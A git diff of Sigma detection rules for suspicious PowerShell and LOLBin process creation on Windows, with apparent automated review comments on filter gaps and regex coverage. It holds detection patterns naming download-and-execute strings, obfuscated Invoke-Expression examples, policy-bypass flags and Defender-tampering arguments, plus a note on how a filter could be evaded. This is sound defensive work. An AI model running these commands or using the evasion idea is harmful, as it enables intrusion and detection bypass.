 ParentProcessName: C:\Windows\System32\msiexec.exe
 condition: process_creation and (all of selection_* and not 1 of filter_*)
 falsepositives:
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_stop_service.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_stop_service.yml
index c0c294371..580c76263 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_stop_service.yml
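Review bot: `filter_msiexec` excludes on `CommandLine|contains` with the Exchange-setup fragment `$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null`, so any msiexec-spawned PowerShell whose command line merely embeds that fragment is dropped even if the rest of the line adds the Exchange snap-in and exports mailboxes; a malicious MSI custom action could reuse the string to stay under the filter. The comment added above it documents only the benign `ParentCommandLine`, not why substring matching is sufficient. If the legitimate installer invocation actually begins with that text (not visible in this hunk), `CommandLine|startswith` would close the gap at no cost to the false-positive suppression; otherwise a note such as `# contains-match is intentionally loose; an MSI custom action embedding this string would be filtered` should sit next to the filter so the trade-off is explicit.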
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_stop_service.yml
@@ -1,8 +1,8 @@
 title: Stop Windows Service Via PowerShell Stop-Service
 id: c49c5062-0966-4170-9efd-9968c913a6cf
 related:
- - id: eb87818d-db5d-49cc-a987-d5da331fbd90
- type: obsoletes
+ - id: eb87818d-db5d-49cc-a987-d5da331fbd90
+ type: obsoletes
 status: test
 description: Detects the stopping of a Windows service
 author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)
@@ -18,17 +18,16 @@ detection:
 EventID: 4688
 Channel: Security
 selection_sc_net_img:
- - OriginalFileName:
- - PowerShell.EXE
- - pwsh.dll
- - NewProcessName|endswith:
- - \powershell.exe
- - \pwsh.exe
+ - OriginalFileName:
+ - PowerShell.EXE
+ - pwsh.dll
+ - NewProcessName|endswith:
+ - \powershell.exe
+ - \pwsh.exe
 selection_cli:
- CommandLine|contains: 'Stop-Service '
+ CommandLine|contains: 'Stop-Service '
 condition: process_creation and (all of selection_*)
 falsepositives:
- - There are many legitimate reasons to stop a service. This rule isn't looking
- for any suspicious behaviour in particular. Filter legitimate activity accordingly
+ - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly
 level: low
 ruletype: Sigma
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_susp_child_processes.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_susp_child_processes.yml
index 4109e2221..93bd1fcad 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_susp_child_processes.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_susp_child_processes.yml
@@ -22,7 +22,7 @@ detection:
 - \powershell_ise.exe
 - \powershell.exe
 - \pwsh.exe
- NewProcessName|endswith:
+ NewProcessName|endswith:
 - \bash.exe
 - \bitsadmin.exe
 - \certutil.exe
@@ -39,12 +39,10 @@ detection:
 - \wmic.exe
 - \wscript.exe
 filter_optional_amazon:
- ParentCommandLine|contains: \Program Files\Amazon\WorkspacesConfig\Scripts\
- CommandLine|contains: \Program Files\Amazon\WorkspacesConfig\Scripts\
+ ParentCommandLine|contains: \Program Files\Amazon\WorkspacesConfig\Scripts\ # AWS Workspaces
+ CommandLine|contains: \Program Files\Amazon\WorkspacesConfig\Scripts\ # AWS Workspaces
 condition: process_creation and (selection and not 1 of filter_optional_*)
 falsepositives:
- - Some false positive is to be expected from PowerShell scripts that might make
- use of additional binaries such as "mshta", "bitsadmin", etc. Apply additional
- filters for those scripts when needed.
+ - Some false positive is to be expected from PowerShell scripts that might make use of additional binaries such as "mshta", "bitsadmin", etc. Apply additional filters for those scripts when needed.
 level: high
 ruletype: Sigma
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_susp_download_patterns.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_susp_download_patterns.yml
index bf1fa5bcd..8c590de71 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_susp_download_patterns.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_susp_download_patterns.yml
@@ -1,12 +1,10 @@
 title: Suspicious PowerShell Download and Execute Pattern
 id: e6c54d94-498c-4562-a37c-b469d8e9a275
 related:
- - id: 3b6ab547-8ec2-4991-b9d2-2b06702a48d7
- type: derived
+ - id: 3b6ab547-8ec2-4991-b9d2-2b06702a48d7
+ type: derived
 status: test
-description: Detects suspicious PowerShell download patterns that are often used in
- malicious scripts, stagers or downloaders (make sure that your backend applies
- the strings case-insensitive)
+description: Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)
 references:
 - https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70
 - https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html
@@ -24,7 +22,7 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- CommandLine|contains:
+ CommandLine|contains: # make sure that your backend applies the strings case-insensitive
 - IEX ((New-Object Net.WebClient).DownloadString
 - IEX (New-Object Net.WebClient).DownloadString
 - IEX((New-Object Net.WebClient).DownloadString
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml
index 0e66f9762..556abf4d3 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml
@@ -4,8 +4,7 @@ status: test
 description: Detects suspicious PowerShell invocation with a parameter substring
 references:
 - http://www.danielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easier
-author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez
- (Fix)
+author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)
 date: 2019/01/16
 modified: 2022/07/14
 tags:
@@ -19,7 +18,7 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- CommandLine|contains:
+ CommandLine|contains:
 - ' -windowstyle h '
 - ' -windowstyl h'
 - ' -windowsty h'
@@ -128,7 +127,7 @@ detection:
 - ' /exe bypass'
 - ' /ex bypass'
 - ' /ep bypass'
- NewProcessName|endswith:
+ NewProcessName|endswith:
 - \powershell.exe
 - \pwsh.exe
 condition: process_creation and selection
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_susp_parent_process.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_susp_parent_process.yml
index 2cd3a3684..94ac40405 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_susp_parent_process.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_susp_parent_process.yml
@@ -1,8 +1,8 @@
 title: Suspicious PowerShell Parent Process
 id: 754ed792-634f-40ae-b3bc-e0448d33f695
 related:
- - id: 692f0bec-83ba-4d04-af7e-e884a96059b6
- type: derived
+ - id: 692f0bec-83ba-4d04-af7e-e884a96059b6
+ type: derived
 status: test
 description: Detects a suspicious or uncommon parent processes of PowerShell
 references:
@@ -21,43 +21,43 @@ detection:
 EventID: 4688
 Channel: Security
 selection_parent:
- - ParentProcessName|contains: tomcat
- - ParentProcessName|endswith:
- - \amigo.exe
- - \browser.exe
- - \chrome.exe
- - \firefox.exe
- - \httpd.exe
- - \iexplore.exe
- - \jbosssvc.exe
- - \microsoftedge.exe
- - \microsoftedgecp.exe
- - \MicrosoftEdgeSH.exe
- - \mshta.exe
- - \nginx.exe
- - \outlook.exe
- - \php-cgi.exe
- - \regsvr32.exe
- - \rundll32.exe
- - \safari.exe
- - \services.exe
- - \sqlagent.exe
- - \sqlserver.exe
- - \sqlservr.exe
- - \vivaldi.exe
- - \w3wp.exe
+ - ParentProcessName|contains: tomcat
+ - ParentProcessName|endswith:
+ - \amigo.exe
+ - \browser.exe
+ - \chrome.exe
+ - \firefox.exe
+ - \httpd.exe
+ - \iexplore.exe
+ - \jbosssvc.exe
+ - \microsoftedge.exe
+ - \microsoftedgecp.exe
+ - \MicrosoftEdgeSH.exe
+ - \mshta.exe
+ - \nginx.exe
+ - \outlook.exe
+ - \php-cgi.exe
+ - \regsvr32.exe
+ - \rundll32.exe
+ - \safari.exe
+ - \services.exe
+ - \sqlagent.exe
+ - \sqlserver.exe
+ - \sqlservr.exe
+ - \vivaldi.exe
+ - \w3wp.exe
 selection_powershell:
- - NewProcessName|endswith:
- - \powershell.exe
- - \pwsh.exe
- - CommandLine|contains:
- - /c powershell
- - /c pwsh
- - Description: Windows PowerShell
- - Product: PowerShell Core 6
- - OriginalFileName:
- - PowerShell.EXE
- - pwsh.dll
+ - NewProcessName|endswith:
+ - \powershell.exe
+ - \pwsh.exe
+ - CommandLine|contains:
+ - /c powershell # FPs with sub processes that contained "powershell" somewhere in the command line
+ - /c pwsh
+ - Description: Windows PowerShell
+ - Product: PowerShell Core 6
+ - OriginalFileName:
+ - PowerShell.EXE
+ - pwsh.dll
 condition: process_creation and (all of selection_*)
 falsepositives:
 - Other scripts
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_susp_ps_appdata.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_susp_ps_appdata.yml
index a6afb81ef..045bae8e1 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_susp_ps_appdata.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_susp_ps_appdata.yml
@@ -1,8 +1,7 @@
 title: PowerShell Script Run in AppData
 id: ac175779-025a-4f12-98b0-acdaeb77ea85
 status: test
-description: Detects a suspicious command line execution that invokes PowerShell with
- reference to an AppData folder
+description: Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder
 references:
 - https://twitter.com/JohnLaTwC/status/1082851155481288706
 - https://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03
@@ -20,16 +19,16 @@ detection:
 EventID: 4688
 Channel: Security
 selection1:
- CommandLine|contains:
+ CommandLine|contains:
 - powershell.exe
 - \powershell
 - \pwsh
 - pwsh.exe
 selection2:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - '/c '
 - \AppData\
- CommandLine|contains:
+ CommandLine|contains:
 - Local\
 - Roaming\
 condition: process_creation and (all of selection*)
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_susp_ps_downloadfile.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_susp_ps_downloadfile.yml
index f05513107..b31bf4fe2 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_susp_ps_downloadfile.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_susp_ps_downloadfile.yml
@@ -1,8 +1,7 @@
 title: PowerShell DownloadFile
 id: 8f70ac5f-1f6f-4f8e-b454-db19561216c5
 status: test
-description: Detects the execution of powershell, a WebClient object creation and
- the invocation of DownloadFile in a single command line
+description: Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line
 references:
 - https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html
 author: Florian Roth (Nextron Systems)
@@ -22,7 +21,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - powershell - .DownloadFile - System.Net.WebClient diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_tamper_defender_remove_mppreference.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_tamper_defender_remove_mppreference.yml index ee882cea7..21679db7d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_tamper_defender_remove_mppreference.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_tamper_defender_remove_mppreference.yml @@ -1,11 +1,10 @@ title: Tamper Windows Defender Remove-MpPreference id: 07e3cb2c-0608-410d-be4b-1511cb1a0448 related: - - id: ae2bdd58-0681-48ac-be7f-58ab4e593458 - type: similar + - id: ae2bdd58-0681-48ac-be7f-58ab4e593458 + type: similar status: test -description: Detects attempts to remove Windows Defender configurations using the - 'MpPreference' cmdlet +description: Detects attempts to remove Windows Defender configurations using the 'MpPreference' cmdlet references: - https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088 author: Nasreddine Bencherchali (Nextron Systems) @@ -21,9 +20,9 @@ detection: EventID: 4688 Channel: Security selection_remove: - CommandLine|contains: Remove-MpPreference + CommandLine|contains: Remove-MpPreference selection_tamper: - CommandLine|contains: + CommandLine|contains: - '-ControlledFolderAccessProtectedFolders ' - '-AttackSurfaceReductionRules_Ids ' - '-AttackSurfaceReductionRules_Actions ' diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_token_obfuscation.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_token_obfuscation.yml index 60e642d5b..da67be2d0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_token_obfuscation.yml 
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_token_obfuscation.yml @@ -1,8 +1,8 @@ title: Powershell Token Obfuscation - Process Creation id: deb9b646-a508-44ee-b7c9-d8965921c6b6 related: - - id: f3a98ce4-6164-4dd4-867c-4d83de7eca51 - type: similar + - id: f3a98ce4-6164-4dd4-867c-4d83de7eca51 + type: similar status: test description: Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation references: @@ -21,9 +21,15 @@ detection: EventID: 4688 Channel: Security selection: - - CommandLine|re: \w+`(\w+|-|.)`[\w+|\s] - - CommandLine|re: '"(\{\d\})+"\s*-f' - - CommandLine|re: \$\{((e|n|v)*`(e|n|v)*)+:path\}|\$\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\}|\$\{env:((p|a|t|h)*`(p|a|t|h)*)+\} + # Examples: + # IN`V`o`Ke-eXp`ResSIOn (Ne`W-ob`ject Net.WebClient).DownloadString + # &('In'+'voke-Expressi'+'o'+'n') (.('New-Ob'+'jec'+'t') Net.WebClient).DownloadString + # &("{2}{3}{0}{4}{1}"-f 'e','Expression','I','nvok','-') (&("{0}{1}{2}"-f'N','ew-O','bject') Net.WebClient).DownloadString + # ${e`Nv:pATh} + - CommandLine|re: \w+`(\w+|-|.)`[\w+|\s] + # - CommandLine|re: '\((\'(\w|-|\.)+\'\+)+\'(\w|-|\.)+\'\)' TODO: fixme + - CommandLine|re: '"(\{\d\})+"\s*-f' + - CommandLine|re: \$\{((e|n|v)*`(e|n|v)*)+:path\}|\$\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\}|\$\{env:((p|a|t|h)*`(p|a|t|h)*)+\} condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_user_discovery_get_aduser.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_user_discovery_get_aduser.yml index 29c22b28c..e88c93c1f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_user_discovery_get_aduser.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_user_discovery_get_aduser.yml 
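Review bot: The new example `${e`Nv:pATh}` placed above the third regex would not be matched by that regex as written: `(e|n|v)` and `(p|a|t|h)` accept lowercase only and Sigma's `re` modifier is case-sensitive by default, so the comment overstates coverage unless the conversion target honors a case-insensitive form such as `CommandLine|re|i:`. Either switch to that modifier where it is supported or lower-case the example so the comment reflects what the pattern actually catches. The trailing `[\w+|\s]` in the first regex is a character class containing `\w`, `+`, `|` and whitespace rather than an alternation; `(\w+|\s)` looks like the intended form, although the practical difference is small. The `'In'+'voke-Expressi'+'o'+'n'` concatenation example is only covered by the regex that is commented out with `TODO: fixme`, so it is currently undetected by this rule; moving that example next to the TODO, or dropping it until the pattern is restored, would avoid misleading readers.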
@@ -1,11 +1,10 @@ title: User Discovery And Export Via Get-ADUser Cmdlet id: 1114e048-b69c-4f41-bc20-657245ae6e3f related: - - id: c2993223-6da8-4b1a-88ee-668b8bf315e9 - type: similar + - id: c2993223-6da8-4b1a-88ee-668b8bf315e9 + type: similar status: test -description: Detects usage of the Get-ADUser cmdlet to collect user information and - output it to a file +description: Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file references: - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html - https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/ @@ -23,17 +22,17 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'Get-ADUser ' - ' -Filter \*' - CommandLine|contains: + CommandLine|contains: - ' > ' - ' | Select ' - Out-File @@ -41,7 +40,6 @@ detection: - Add-Content condition: process_creation and (all of selection_*) falsepositives: - - Legitimate admin scripts may use the same technique, it's better to exclude - specific computers or users who execute these commands or scripts often + - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_webclient_casing.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_webclient_casing.yml index a4e6b80c2..876497753 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_webclient_casing.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_webclient_casing.yml 
@@ -1,9 +1,7 @@ title: Net WebClient Casing Anomalies id: c86133ad-4725-4bd0-8170-210788e0a7ba status: test -description: Detects PowerShell command line contents that include a suspicious abnormal - casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation - techniques +description: Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques references: - https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/ author: Florian Roth (Nextron Systems) @@ -20,14 +18,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_encoded: - CommandLine|contains: + CommandLine|contains: - TgBlAFQALgB3AEUAQg - 4AZQBUAC4AdwBFAEIA - OAGUAVAAuAHcARQBCA diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_x509enrollment.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_x509enrollment.yml index ed6a14cb8..919ffcac8 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_x509enrollment.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_x509enrollment.yml @@ -1,8 +1,8 @@ title: Suspicious X509Enrollment - Process Creation id: 114de787-4eb2-48cc-abdb-c0b449f93ea4 related: - - id: 504d63cb-0dba-4d02-8531-e72981aace2c - type: similar + - id: 504d63cb-0dba-4d02-8531-e72981aace2c + type: similar status: test description: Detect use of X509Enrollment references: @@ -22,7 +22,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - X509Enrollment.CBinaryConverter - 884e2002-217d-11da-b2a4-000e7bbb2b09 condition: process_creation and selection 
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_xor_commandline.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_xor_commandline.yml index fb7cb12e4..4ded4bf17 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_xor_commandline.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_xor_commandline.yml @@ -1,8 +1,8 @@ title: Suspicious XOR Encoded PowerShell Command id: bb780e0c-16cf-4383-8383-1e5471db6cf9 related: - - id: 5b572dcf-254b-425c-a8c5-d9af6bea35a6 - type: obsoletes + - id: 5b572dcf-254b-425c-a8c5-d9af6bea35a6 + type: obsoletes status: test description: Detects presence of a potentially xor encoded powershell command references: @@ -10,8 +10,7 @@ references: - https://redcanary.com/blog/yellow-cockatoo/ - https://zero2auto.com/2020/05/19/netwalker-re/ - https://mez0.cc/posts/cobaltstrike-powershell-exec/ -author: Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, - oscd.community, Nasreddine Bencherchali +author: Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali date: 2018/09/05 modified: 2023/01/30 tags: @@ -28,18 +27,18 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - Description: Windows PowerShell - - Product: PowerShell Core 6 + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - Description: Windows PowerShell + - Product: PowerShell Core 6 selection_cli_xor: - CommandLine|contains: bxor + CommandLine|contains: bxor selection_cli_other: - CommandLine|contains: + CommandLine|contains: - ForEach - for( - 'for ' 
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_zip_compress.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_zip_compress.yml index 69ac69647..922f8c73f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_zip_compress.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_zip_compress.yml 
@@ -1,22 +1,16 @@ title: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet -id: 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 +id: 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 # Process Creation related: - - id: 71ff406e-b633-4989-96ec-bc49d825a412 - type: similar - - id: daf7eb81-35fd-410d-9d7a-657837e602bb - type: similar - - id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 - type: similar + - id: 71ff406e-b633-4989-96ec-bc49d825a412 # PowerShell Classic + type: similar + - id: daf7eb81-35fd-410d-9d7a-657837e602bb # PowerShell Module + type: similar + - id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 # PowerShell Script + type: similar status: test -description: 'Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet - in order to compress folders and files where the output is stored in a potentially - suspicious location that is used often by malware for exfiltration. - - An adversary might compress data (e.g., sensitive documents) that is collected - prior to exfiltration in order to make it portable and minimize the amount of - data sent over the network. - - ' +description: | + Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. + An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a 
@@ -34,7 +28,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - Compress-Archive -Path*-DestinationPath $env:TEMP - Compress-Archive -Path*-DestinationPath*\AppData\Local\Temp\ - Compress-Archive -Path*-DestinationPath*:\Windows\Temp\ diff --git a/sigma/builtin/process_creation/proc_creation_win_presentationhost_download.yml b/sigma/builtin/process_creation/proc_creation_win_presentationhost_download.yml index 7adf04885..1fe9d18d8 100644 --- a/sigma/builtin/process_creation/proc_creation_win_presentationhost_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_presentationhost_download.yml @@ -1,8 +1,7 @@ title: Arbitrary File Download Via PresentationHost.EXE id: b124ddf4-778d-418e-907f-6dd3fc0d31cd status: test -description: Detects usage of "PresentationHost" which is a utility that runs ".xbap" - (Browser Applications) files to download arbitrary files +description: Detects usage of "PresentationHost" which is a utility that runs ".xbap" (Browser Applications) files to download arbitrary files references: - https://github.com/LOLBAS-Project/LOLBAS/pull/239/files author: Nasreddine Bencherchali (Nextron Systems) @@ -20,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \presentationhost.exe - - OriginalFileName: PresentationHost.exe + - NewProcessName|endswith: \presentationhost.exe + - OriginalFileName: PresentationHost.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - http:// - https:// - ftp:// diff --git a/sigma/builtin/process_creation/proc_creation_win_presentationhost_uncommon_location_exec.yml b/sigma/builtin/process_creation/proc_creation_win_presentationhost_uncommon_location_exec.yml index a84d0b148..481dcb3e5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_presentationhost_uncommon_location_exec.yml +++ b/sigma/builtin/process_creation/proc_creation_win_presentationhost_uncommon_location_exec.yml 
@@ -1,11 +1,8 @@ title: XBAP Execution From Uncommon Locations Via PresentationHost.EXE id: d22e2925-cfd8-463f-96f6-89cec9d9bc5f status: test -description: 'Detects the execution of ".xbap" (Browser Applications) files via PresentationHost.EXE - from an uncommon location. These files can be abused to run malicious ".xbap" - files any bypass AWL - - ' +description: | + Detects the execution of ".xbap" (Browser Applications) files via PresentationHost.EXE from an uncommon location. These files can be abused to run malicious ".xbap" files any bypass AWL references: - https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/ author: Nasreddine Bencherchali (Nextron Systems) @@ -23,12 +20,12 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \presentationhost.exe - - OriginalFileName: PresentationHost.exe + - NewProcessName|endswith: \presentationhost.exe + - OriginalFileName: PresentationHost.exe selection_cli: - CommandLine|contains: .xbap + CommandLine|contains: .xbap filter_main_generic: - CommandLine|contains: + CommandLine|contains: # Filter out legitimate locations if you find them - ' C:\Windows\' - ' C:\Program Files' condition: process_creation and (all of selection* and not 1 of filter_main_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_pressanykey_lolbin_execution.yml b/sigma/builtin/process_creation/proc_creation_win_pressanykey_lolbin_execution.yml index 3017b744c..1ae1a938f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pressanykey_lolbin_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pressanykey_lolbin_execution.yml 
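Review bot: The `filter_main_generic` entries `' C:\Windows\'` and `' C:\Program Files'` anchor on a leading space, so a quoted argument such as `presentationhost.exe "C:\Program Files\Vendor\app.xbap"` is not excluded and will still alert from a location the comment treats as legitimate. If that is not intended, add the quoted forms `' "C:\Windows\'` and `' "C:\Program Files'` to the filter list. The reflowed description still contains the typo `files any bypass AWL`, which should read `files and bypass AWL`.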
@@ -1,11 +1,10 @@ title: Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution id: a20391f8-76fb-437b-abc0-dba2df1952c6 related: - - id: 65c3ca2c-525f-4ced-968e-246a713d164f - type: similar + - id: 65c3ca2c-525f-4ced-968e-246a713d164f + type: similar status: test -description: Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that - can be used to execute any other binary +description: Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary references: - https://twitter.com/mrd0x/status/1463526834918854661 - https://gist.github.com/nasbench/a989ce64cefa8081bd50cf6ad8c491b5 @@ -27,7 +26,6 @@ detection: ParentProcessName|endswith: \Microsoft.NodejsTools.PressAnyKey.exe condition: process_creation and selection falsepositives: - - Legitimate use by developers as part of NodeJS development with Visual Studio - Tools + - Legitimate use by developers as part of NodeJS development with Visual Studio Tools level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_print_remote_file_copy.yml b/sigma/builtin/process_creation/proc_creation_win_print_remote_file_copy.yml index af8eae9a6..1a3efa814 100644 --- a/sigma/builtin/process_creation/proc_creation_win_print_remote_file_copy.yml +++ b/sigma/builtin/process_creation/proc_creation_win_print_remote_file_copy.yml @@ -19,13 +19,13 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|startswith: print - CommandLine|contains|all: + CommandLine|startswith: print + CommandLine|contains|all: - /D - .exe - NewProcessName|endswith: \print.exe + NewProcessName|endswith: \print.exe filter_print: - CommandLine|contains: print.exe + CommandLine|contains: print.exe condition: process_creation and (selection and not filter_print) falsepositives: - Unknown 
diff --git a/sigma/builtin/process_creation/proc_creation_win_protocolhandler_download.yml b/sigma/builtin/process_creation/proc_creation_win_protocolhandler_download.yml index 63e5913d2..6977f9ddd 100644 --- a/sigma/builtin/process_creation/proc_creation_win_protocolhandler_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_protocolhandler_download.yml @@ -1,10 +1,8 @@ title: File Download Using ProtocolHandler.exe id: 104cdb48-a7a8-4ca7-a453-32942c6e5dcb status: test -description: 'Detects usage of "ProtocolHandler" to download files. Downloaded files - will be located in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) - - ' +description: | + Detects usage of "ProtocolHandler" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md - https://lolbas-project.github.io/lolbas/OtherMSBinaries/ProtocolHandler/ @@ -22,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \protocolhandler.exe - - OriginalFileName: ProtocolHandler.exe + - NewProcessName|endswith: \protocolhandler.exe + - OriginalFileName: ProtocolHandler.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ftp:// - http:// - https:// diff --git a/sigma/builtin/process_creation/proc_creation_win_provlaunch_potential_abuse.yml b/sigma/builtin/process_creation/proc_creation_win_provlaunch_potential_abuse.yml index 349992fa8..ec4ab4ab1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_provlaunch_potential_abuse.yml +++ 